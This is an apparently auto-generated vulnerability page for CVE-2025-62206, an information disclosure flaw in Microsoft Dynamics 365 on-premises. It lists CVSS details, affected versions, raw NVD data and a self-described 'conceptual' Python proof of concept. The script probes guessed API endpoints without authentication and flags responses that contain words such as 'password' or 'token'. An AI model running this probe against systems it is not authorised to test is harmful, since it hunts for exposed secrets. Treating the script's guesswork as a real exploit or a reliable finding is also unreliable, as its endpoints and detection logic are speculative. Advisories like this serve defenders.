Security Vulnerability Report
中文
CVE-2025-62206 CVSS 6.5 MEDIUM

CVE-2025-62206

Published: 2025-11-11 18:15:48
Last Modified: 2025-11-17 17:40:57

Description

Exposure of sensitive information to an unauthorized actor in Microsoft Dynamics 365 (on-premises) allows an unauthorized attacker to disclose information over a network.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:microsoft:dynamics_365:*:*:*:*:on-premises:*:*:* - VULNERABLE
Microsoft Dynamics 365 (on-premises) - 所有未安装安全更新的版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62206 PoC - Microsoft Dynamics 365 Information Disclosure # Note: This is a conceptual PoC based on the vulnerability description # Actual exploitation may require specific authentication context or user interaction import requests import sys def check_vulnerability(target_url): """ Check if target Microsoft Dynamics 365 instance is vulnerable to CVE-2025-62206 """ # Common Dynamics 365 endpoints that might be affected endpoints = [ '/api/data/v9.0/', '/api/discovery/', '/api/business/', '/api/custom/', ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json', } vulnerable = False results = [] for endpoint in endpoints: try: url = target_url.rstrip('/') + endpoint response = requests.get(url, headers=headers, timeout=10, verify=False) # Check if response contains sensitive information without proper auth if response.status_code == 200: # Check for sensitive data patterns in response if any(pattern in response.text.lower() for pattern in ['password', 'secret', 'token', 'key', 'credential']): vulnerable = True results.append(f"[+] Potential sensitive data found at {endpoint}") results.append(f" Status: {response.status_code}") results.append(f" Content length: {len(response.text)} bytes") except requests.exceptions.RequestException as e: results.append(f"[-] Error accessing {endpoint}: {str(e)}") if vulnerable: print("[*] Target appears to be VULNERABLE to CVE-2025-62206") print("[*] Sensitive information disclosure possible without authentication") else: print("[*] Target does not appear to be vulnerable (or proper auth is required)") return vulnerable, results if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} https://dynamics365.example.com") sys.exit(1) target = sys.argv[1] vulnerable, results = check_vulnerability(target) for result in results: print(result)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62206", "sourceIdentifier": "[email protected]", "published": "2025-11-11T18:15:47.750", "lastModified": "2025-11-17T17:40:57.177", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of sensitive information to an unauthorized actor in Microsoft Dynamics 365 (on-premises) allows an unauthorized attacker to disclose information over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:dynamics_365:*:*:*:*:on-premises:*:*:*", "versionStartIncluding": "9.1", "versionEndExcluding": "9.1.41.07", "matchCriteriaId": "15CCC42B-7994-462B-9C7D-417C85AF2F25"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62206", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}